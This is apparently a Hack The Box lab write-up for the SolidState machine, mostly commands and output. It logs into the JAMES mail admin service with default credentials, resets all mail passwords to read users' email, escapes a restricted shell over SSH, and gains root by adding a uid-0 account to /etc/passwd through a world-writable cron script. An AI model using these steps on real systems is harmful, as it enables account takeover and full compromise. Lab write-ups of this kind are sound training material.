SolidState

tags: HTB Medium Linux OSCP
Platform: Hackthebox
Difficult: Medium
S.O.: Linux

Enumeration

Nmap

To get started, we run a quick open ports scan.

# nmap -p- -T4 10.10.10.51
Starting Nmap 7.80 ( https://nmap.org ) at 2021-03-23 18:35 CET
Nmap scan report for 10.10.10.51
Host is up (0.093s latency).
Not shown: 65529 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
25/tcp   open  smtp
80/tcp   open  http
110/tcp  open  pop3
119/tcp  open  nntp
4555/tcp open  rsip

Nmap done: 1 IP address (1 host up) scanned in 76.06 seconds

Now that we know the open ports, let's scan them in depth.

# nmap -A -Pn -p 22,25,80,110,119,4555 10.10.10.51
Starting Nmap 7.80 ( https://nmap.org ) at 2021-03-23 18:39 CET
Nmap scan report for 10.10.10.51
Host is up (0.093s latency).

PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)
| ssh-hostkey: 
|   2048 77:00:84:f5:78:b9:c7:d3:54:cf:71:2e:0d:52:6d:8b (RSA)
|   256 78:b8:3a:f6:60:19:06:91:f5:53:92:1d:3f:48:ed:53 (ECDSA)
|_  256 e4:45:e9:ed:07:4d:73:69:43:5a:12:70:9d:c4:af:76 (ED25519)
25/tcp   open  smtp        JAMES smtpd 2.3.2
|_smtp-commands: solidstate Hello nmap.scanme.org (10.10.14.7 [10.10.14.7]), 
80/tcp   open  http        Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Home - Solid State Security
110/tcp  open  pop3        JAMES pop3d 2.3.2
119/tcp  open  nntp        JAMES nntpd (posting ok)
4555/tcp open  james-admin JAMES Remote Admin 2.3.2
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.12 (95%), Linux 3.13 (95%), Linux 3.16 (95%), Linux 3.18 (95%), Linux 3.2 - 4.9 (95%), Linux 3.8 - 3.11 (95%), Linux 4.8 (95%), Linux 4.4 (95%), Linux 4.9 (95%), Linux 4.2 (95%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: solidstate; OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 110/tcp)
HOP RTT      ADDRESS
1   92.98 ms 10.10.14.1
2   93.12 ms 10.10.10.51

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 28.34 seconds

JAMES Remote Admin

Googling we could find that the default credentials are root:root and still working!

# nc 10.10.10.51 4555
JAMES Remote Administration Tool 2.3.2
Please enter your login and password
Login id:
root
Password:
root
Welcome root. HELP for a list of commands
help
Currently implemented commands:
help                                    display this help
listusers                               display existing accounts
countusers                              display the number of existing accounts
adduser [username] [password]           add a new user
verify [username]                       verify if specified user exist
deluser [username]                      delete existing user
setpassword [username] [password]       sets a user's password
setalias [user] [alias]                 locally forwards all email for 'user' to 'alias'
showalias [username]                    shows a user's current email alias
unsetalias [user]                       unsets an alias for 'user'
setforwarding [username] [emailaddress] forwards a user's email to another email address
showforwarding [username]               shows a user's current email forwarding
unsetforwarding [username]              removes a forward
user [repositoryname]                   change to another user repository
shutdown                                kills the current JVM (convenient when James is run as a daemon)
quit                                    close connection

Let's see what users there are.

listusers
Existing accounts 5
user: james
user: thomas
user: john
user: mindy
user: mailadmin

Exploitation

Well, we are going to change the password of all of them and read their emails.

setpassword james james  
Password for james reset
setpassword thomas thomas
Password for thomas reset
setpassword john john
Password for john reset
setpassword mindy mindy
Password for mindy reset
setpassword mailadmin mailadmin
Password for mailadmin reset

Let's add the accounts to Thunderbird.

As we can see, John has a message in his inbox.

Can you please restrict mindy's access until she gets read on to the program. Also make sure that you send her a tempory password to login to her accounts.

Thank you in advance.

Respectfully,
James

And mindy has two messages.

Dear Mindy,
Welcome to Solid State Security Cyber team! We are delighted you are joining us as a junior defense analyst. Your role is critical in fulfilling the mission of our orginzation. The enclosed information is designed to serve as an introduction to Cyber Security and provide resources that will help you make a smooth transition into your new role. The Cyber team is here to support your transition so, please know that you can call on any of us to assist you.

We are looking forward to you joining our team and your success at Solid State Security. 

Respectfully,
James

In this one, we can find a creds!

Dear Mindy,

Here are your ssh credentials to access the system. Remember to reset your password after your first login. 
Your access is restricted at the moment, feel free to ask your supervisor to add any commands you need to your path. 

username: mindy
pass: [email protected][email protected]

Respectfully,
James

We are going to connect by SSH with these credentials.

# ssh [email protected]
[email protected]’s password: 
Linux solidstate 4.9.0-3-686-pae #1 SMP Debian 4.9.30-2+deb9u3 (2017-08-06) i686

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
............................................................................
............................................................................
-rbash: $'\r': command not found
[email protected]:~$ id
-rbash: id: command not found
[email protected]:~$ /bin/sh
-rbash: /bin/sh: restricted: cannot specify `/' in command names
[email protected]:~$

Okay... we are jailed... Well let's get away 🤷🏻‍♂️

Jail escape

Running the command compgen -c we can see what commands we have available.

We can execute cat, give me the user's flag!

[email protected]:~$ cat user.txt
CENSORED_FLAG

Trying to escape with SSH... Done!

# ssh [email protected] -t "bash"
[email protected]'s password: 
${debian_chroot:+($debian_chroot)}[email protected]:~$ id
uid=1001(mindy) gid=1001(mindy) groups=1001(mindy)
${debian_chroot:+($debian_chroot)}[email protected]:~$

Post exploitation

Enumeration

Pspy

2021/03/23 15:54:01 CMD: UID=0    PID=14955  | /bin/sh -c python /opt/tmp.py

Wow! we can edit the script! Well, we are going to inject a user with root privileges in the file/etc/passwd.

${debian_chroot:+($debian_chroot)}[email protected]:~$ ls -la /opt/tmp.py
-rwxrwxrwx 1 root root 105 Aug 22  2017 /opt/tmp.py

Privilege escalation

Okay, let's add our code to the script.

#!/usr/bin/env python
import os
import sys

passwd = open('/etc/passwd', 'r').readlines()

if not any('x4v1l0k' in s for s in passwd):
        output = open('/etc/passwd', 'a')
        output.write('x4v1l0k:x4sRFbMkq2HHM:0:0:root:/root:/bin/bash')
        output.close()

try:
        os.system('rm -r /tmp/* ')
except:
        sys.exit()
2021/03/23 16:06:01 CMD: UID=0    PID=932    | /bin/sh -c python /opt/tmp.py 
2021/03/23 16:06:01 CMD: UID=0    PID=933    | python /opt/tmp.py 

Perfect, the script has been executed. We are going to check if the user has been injected and in that case to authenticate with it.

${debian_chroot:+($debian_chroot)}[email protected]:~$ cat /etc/passwd | tail -n 1
x4v1l0k:x4sRFbMkq2HHM:0:0:root:/root:/bin/bash
${debian_chroot:+($debian_chroot)}[email protected]:~$ su x4v1l0k
Password: 
[email protected]:/home/mindy# id
uid=0(root) gid=0(root) groups=0(root)
[email protected]:/home/mindy# cat /root/root.txt
CENSORED_FLAG

That's all folks!